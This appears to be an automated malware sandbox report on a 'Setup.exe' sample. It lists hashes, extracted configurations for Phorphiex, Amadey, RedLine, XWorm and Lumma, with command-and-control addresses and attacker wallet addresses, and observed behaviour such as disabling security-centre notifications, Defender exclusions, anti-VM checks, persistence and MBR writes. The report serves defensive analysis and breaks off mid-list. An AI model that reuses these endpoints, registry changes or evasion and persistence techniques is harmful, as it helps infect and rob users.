Resubmissions
14-06-2024 17:24
240614-vyrjpazcrg 1014-06-2024 17:22
240614-vxll2stcqp 1012-06-2024 23:54
240612-3x2x2awcph 3Analysis
-
max time kernel
103s -
max time network
660s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
14-06-2024 17:24
Static task
static1
General
-
Target
Setup.exe
-
Size
12KB
-
MD5
a14e63d27e1ac1df185fa062103aa9aa
-
SHA1
2b64c35e4eff4a43ab6928979b6093b95f9fd714
-
SHA256
dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453
-
SHA512
10418efcce2970dcdbef1950464c4001753fccb436f4e8ba5f08f0d4d5c9b4a22a48f2803e59421b720393d84cfabd338497c0bc77cdd4548990930b9c350082
-
SSDEEP
192:brl2reIazGejA7HhdSbw/z1ULU87glpK/b26J4S1Xu85:b52r+xjALhMWULU870gJJ
Malware Config
Extracted
phorphiex
http://185.215.113.66/
http://77.91.77.92/
http://91.202.233.141/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
LLeT2zkStY3cvxMBFhoWXkG5VuZPoezduv
rwc4LVd9ABpULQ1CuCpDkgX2xVB1fUijyb
4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
17hgMFyLDwMjxWqw5GhijhnPdJDyFDqecY
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1epx67ne4vckqmaj4gwke8m322f4yjr6eh52wqw
bc1qmpkehfffkr6phuklsksnd7nhgx0369sxu772m3
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
-
mutex
55a4er5wo
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Extracted
amadey
4.21
0e6740
http://147.45.47.155
-
install_dir
9217037dc9
-
install_file
explortu.exe
-
strings_key
8e894a8a4a3d0da8924003a561cfb244
-
url_paths
/ku4Nor9/index.php
Extracted
redline
@LOGSCLOUDYT_BOT
185.172.128.33:8970
Extracted
xworm
5.0
64.226.123.178:6098
1z0ENxCLSR3XRSre
-
install_file
USB.exe
Extracted
xworm
3.1
185.91.127.220:7000
200.9.155.204:7000
0liuzqSbSYrrf5nM
-
install_file
USB.exe
Extracted
redline
0011
185.91.127.219:33455
Extracted
lumma
https://willingyhollowsk.shop/api
https://distincttangyflippan.shop/api
https://macabrecondfucews.shop/api
https://greentastellesqwm.shop/api
https://stickyyummyskiwffe.shop/api
https://sturdyregularrmsnhw.shop/api
https://lamentablegapingkwaq.shop/api
https://innerverdanytiresw.shop/api
https://standingcomperewhitwo.shop/api
Signatures
-
Detect Xehook Payload 3 IoCs
resource yara_rule behavioral1/memory/5704-965-0x0000000000FC0000-0x0000000000FEC000-memory.dmp family_xehook behavioral1/memory/3840-969-0x0000000000900000-0x000000000092C000-memory.dmp family_xehook behavioral1/files/0x000b00000001acf3-1141.dat family_xehook -
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/memory/5272-577-0x00000000005A0000-0x00000000005D6000-memory.dmp family_xworm behavioral1/memory/6732-1066-0x0000000000EC0000-0x0000000000EE6000-memory.dmp family_xworm behavioral1/memory/6168-1186-0x0000000000CA0000-0x0000000000CAE000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" winblrsnrcs.exe -
Phorphiex payload 2 IoCs
resource yara_rule behavioral1/files/0x000900000001aacd-11.dat family_phorphiex behavioral1/files/0x000800000001abef-216.dat family_phorphiex -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral1/memory/5580-419-0x0000000000850000-0x00000000008A2000-memory.dmp family_redline behavioral1/memory/1256-1185-0x0000000000620000-0x0000000000670000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 6100 created 3380 6100 1453930929.exe 55 PID 6100 created 3380 6100 1453930929.exe 55 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" winblrsnrcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" winblrsnrcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" winblrsnrcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" winblrsnrcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" winblrsnrcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" winblrsnrcs.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explortu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explortu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ http77.91.77.82mineamadka.exe.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ s.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ s.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explortu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ http77.91.77.80mineamadka.exe.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 7204 powershell.exe 6752 powershell.exe 6676 powershell.exe 5756 powershell.exe 1000 powershell.exe 5112 powershell.exe 7668 powershell.exe 6072 powershell.exe 6560 powershell.exe 2284 powershell.exe 8028 powershell.exe 5800 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion http77.91.77.80mineamadka.exe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion http77.91.77.80mineamadka.exe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion http77.91.77.82mineamadka.exe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion http77.91.77.82mineamadka.exe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion s.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion s.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion s.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion s.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explortu.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk c05a20d254.exe -
Executes dropped EXE 64 IoCs
pid Process 1304 http185.215.113.66pei.exe.exe 1504 httptwizt.netnewtpp.exe.exe 2124 sysmablsvr.exe 3908 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 1736 http185.172.128.127tiktok.exe.exe 2632 143303174.exe 4784 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 4176 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 1712 http77.91.77.80mineamadka.exe.exe 4808 explortu.exe 5052 explortu.exe 1452 http77.91.77.82mineamadka.exe.exe 2272 406625063.exe 2952 c05a20d254.exe 1056 4e6762088f.exe 5240 952927809.exe 5272 http77.91.77.82lendalex.exe.exe 5580 svhoost.exe 5596 One.exe 5984 http77.91.77.82lendw.exe.exe 6056 s.exe 6100 1453930929.exe 6128 http77.91.77.82lend228.exe.exe 5136 2026229022.exe 5420 http77.91.77.81lendvictor.exe.exe 5792 http77.91.77.81lendfile.exe.exe 8 http77.91.77.81lend228.exe.exe 5228 http77.91.77.82lendlook.exe.exe 5272 http77.91.77.82lendlook.exe.exe 5256 http77.91.77.81lendlook.exe.exe 5612 http77.91.77.81lendlook.exe.exe 6024 http77.91.77.81lendw.exe.exe 5264 3235322023.exe 5252 s.exe 6044 winblrsnrcs.exe 5284 http106.166.173.36imgtest.exe.exe 2468 http77.91.77.81lendswizzy.exe.exe 3292 http106.166.173.36imgtest.exe.exe 5204 http77.91.77.82lendfileosn.exe.exe 6064 http77.91.77.82lendinstaller2.exe.exe 6408 http77.91.77.82lendfile.exe.exe 6432 http77.91.77.82lendnn.exe.exe 6508 http77.91.77.82lendnn.exe.exe 6676 http77.91.77.81lendfileosn.exe.exe 6660 http77.91.77.81lendinstaller2.exe.exe 6292 http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe 4708 http77.91.77.81lendfud.exe.exe 6308 http77.91.77.82lend1234.exe.exe 5284 http77.91.77.81lendalex.exe.exe 5836 http77.91.77.81lendnn.exe.exe 6488 http77.91.77.81lendfud.exe.exe 5576 http77.91.77.82lendvictor.exe.exe 6708 http77.91.77.81lendnn.exe.exe 5704 http77.91.77.81lend37.exe.exe 3840 http77.91.77.81lend27.exe.exe 6220 1338716755.exe 5488 http77.91.77.82lendii.exe.exe 2744 http77.91.77.82lendfud.exe.exe 6444 http77.91.77.82lendii.exe.exe 5864 http77.91.77.82lendfud.exe.exe 6844 One.exe 7080 svhoost.exe 6112 http77.91.77.81lendcleaner.exe.exe 764 http77.91.77.82lendcleaner.exe.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine explortu.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine http77.91.77.82mineamadka.exe.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine explortu.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine http77.91.77.80mineamadka.exe.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine explortu.exe -
Loads dropped DLL 1 IoCs
pid Process 6308 http77.91.77.82lend1234.exe.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/6056-604-0x0000000000190000-0x0000000000AF4000-memory.dmp themida behavioral1/memory/6056-607-0x0000000000190000-0x0000000000AF4000-memory.dmp themida behavioral1/memory/5252-852-0x0000000000190000-0x0000000000AF4000-memory.dmp themida behavioral1/memory/5252-853-0x0000000000190000-0x0000000000AF4000-memory.dmp themida behavioral1/memory/5252-951-0x0000000000190000-0x0000000000AF4000-memory.dmp themida -
resource yara_rule behavioral1/memory/5284-663-0x0000000000C70000-0x0000000001C94000-memory.dmp upx behavioral1/memory/3292-675-0x0000000000C70000-0x0000000001C94000-memory.dmp upx behavioral1/memory/5284-674-0x0000000000C70000-0x0000000001C94000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" winblrsnrcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" winblrsnrcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" winblrsnrcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" winblrsnrcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" winblrsnrcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" winblrsnrcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" winblrsnrcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 c05a20d254.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 c05a20d254.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 c05a20d254.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" c05a20d254.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_30f85fd004d4df68ea1f8d35c18db496 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_30f85fd004d4df68ea1f8d35c18db496\\AdobeUpdaterV131.exe" c05a20d254.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_f09ac2d587354c6431bf93812ba7548f = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_f09ac2d587354c6431bf93812ba7548f\\AdobeUpdaterV131.exe" c05a20d254.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmablsvr.exe" httptwizt.netnewtpp.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\c05a20d254.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\c05a20d254.exe" explortu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winblrsnrcs.exe" 3235322023.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA s.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA s.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow ioc 255 bitbucket.org 287 pastebin.com 542 pastebin.com 543 pastebin.com 573 pastebin.com 176 bitbucket.org 179 bitbucket.org 254 bitbucket.org 258 pastebin.com 261 pastebin.com -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 327 ipinfo.io 109 ipinfo.io 114 ipinfo.io 194 ip-api.com 251 ip-api.com 323 api.myip.com 325 api.myip.com 326 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 http77.91.77.82lend1234.exe.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000800000001ac1b-342.dat autoit_exe behavioral1/files/0x000700000001ace9-1044.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe http77.91.77.82lendinstaller2.exe.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
pid Process 1712 http77.91.77.80mineamadka.exe.exe 4808 explortu.exe 5052 explortu.exe 1452 http77.91.77.82mineamadka.exe.exe 2952 c05a20d254.exe 2952 c05a20d254.exe 6056 s.exe 2952 c05a20d254.exe 5252 s.exe 6064 http77.91.77.82lendinstaller2.exe.exe 2952 c05a20d254.exe 6064 http77.91.77.82lendinstaller2.exe.exe 6660 http77.91.77.81lendinstaller2.exe.exe 6660 http77.91.77.81lendinstaller2.exe.exe 2952 c05a20d254.exe 2952 c05a20d254.exe 5476 explortu.exe 2952 c05a20d254.exe -
Suspicious use of SetThreadContext 15 IoCs
description pid Process procid_target PID 5272 set thread context of 5412 5272 http77.91.77.82lendalex.exe.exe 109 PID 5228 set thread context of 5272 5228 http77.91.77.82lendlook.exe.exe 130 PID 5256 set thread context of 5612 5256 http77.91.77.81lendlook.exe.exe 134 PID 2468 set thread context of 6024 2468 http77.91.77.81lendswizzy.exe.exe 147 PID 5204 set thread context of 6336 5204 http77.91.77.82lendfileosn.exe.exe 152 PID 6432 set thread context of 6508 6432 http77.91.77.82lendnn.exe.exe 270 PID 6676 set thread context of 7020 6676 http77.91.77.81lendfileosn.exe.exe 162 PID 4708 set thread context of 6488 4708 http77.91.77.81lendfud.exe.exe 168 PID 5836 set thread context of 6708 5836 http77.91.77.81lendnn.exe.exe 170 PID 5284 set thread context of 6828 5284 http77.91.77.81lendalex.exe.exe 171 PID 5488 set thread context of 6444 5488 http77.91.77.82lendii.exe.exe 195 PID 2744 set thread context of 5864 2744 http77.91.77.82lendfud.exe.exe 181 PID 6384 set thread context of 5132 6384 http77.91.77.82lendswizzy.exe.exe 204 PID 5436 set thread context of 6208 5436 http77.91.77.81lendii.exe.exe 207 PID 5792 set thread context of 5888 5792 http77.91.77.81lendfile.exe.exe 209 -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\sysmablsvr.exe httptwizt.netnewtpp.exe.exe File opened for modification C:\Windows\sysmablsvr.exe httptwizt.netnewtpp.exe.exe File created C:\Windows\Tasks\explortu.job http77.91.77.80mineamadka.exe.exe File created C:\Windows\winblrsnrcs.exe 3235322023.exe File opened for modification C:\Windows\winblrsnrcs.exe 3235322023.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5868 sc.exe 4508 sc.exe 6224 sc.exe 5916 sc.exe 7012 sc.exe 6988 sc.exe 1948 sc.exe 5000 sc.exe 6740 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 5728 5420 WerFault.exe 120 6836 5576 WerFault.exe 169 -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x000700000001ac8a-529.dat nsis_installer_1 behavioral1/files/0x000700000001ac8a-529.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 c05a20d254.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString c05a20d254.exe -
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4772 schtasks.exe 3128 schtasks.exe 6524 schtasks.exe 6508 schtasks.exe 2080 schtasks.exe 2988 schtasks.exe 5876 schtasks.exe 6548 schtasks.exe 4608 schtasks.exe 4080 schtasks.exe 6448 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 7484 tasklist.exe 5596 tasklist.exe 1256 tasklist.exe 1056 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133628595149355083" chrome.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 svhoost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 svhoost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4784 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 4784 httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe 1712 http77.91.77.80mineamadka.exe.exe 1712 http77.91.77.80mineamadka.exe.exe 4808 explortu.exe 4808 explortu.exe 5052 explortu.exe 5052 explortu.exe 1452 http77.91.77.82mineamadka.exe.exe 1452 http77.91.77.82mineamadka.exe.exe 3188 chrome.exe 3188 chrome.exe 6100 1453930929.exe 6100 1453930929.exe 5336 powershell.exe 5336 powershell.exe 5336 powershell.exe 5336 powershell.exe 5284 http106.166.173.36imgtest.exe.exe 3292 http106.166.173.36imgtest.exe.exe 5204 http77.91.77.82lendfileosn.exe.exe 5204 http77.91.77.82lendfileosn.exe.exe 5204 http77.91.77.82lendfileosn.exe.exe 5204 http77.91.77.82lendfileosn.exe.exe 6064 http77.91.77.82lendinstaller2.exe.exe 6064 http77.91.77.82lendinstaller2.exe.exe 6064 http77.91.77.82lendinstaller2.exe.exe 6660 http77.91.77.81lendinstaller2.exe.exe 6660 http77.91.77.81lendinstaller2.exe.exe 2952 c05a20d254.exe 2952 c05a20d254.exe 6560 powershell.exe 6560 powershell.exe 6560 powershell.exe 6100 1453930929.exe 6100 1453930929.exe 6560 powershell.exe 6292 http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe 6292 http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe 6292 http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe 5476 explortu.exe 5476 explortu.exe 5704 http77.91.77.81lend37.exe.exe 5704 http77.91.77.81lend37.exe.exe 5704 http77.91.77.81lend37.exe.exe 5704 http77.91.77.81lend37.exe.exe 5704 http77.91.77.81lend37.exe.exe 5704 http77.91.77.81lend37.exe.exe 3840 http77.91.77.81lend27.exe.exe 3840 http77.91.77.81lend27.exe.exe 3840 http77.91.77.81lend27.exe.exe 3840 http77.91.77.81lend27.exe.exe 5704 http77.91.77.81lend37.exe.exe 3840 http77.91.77.81lend27.exe.exe 5704 http77.91.77.81lend37.exe.exe 3840 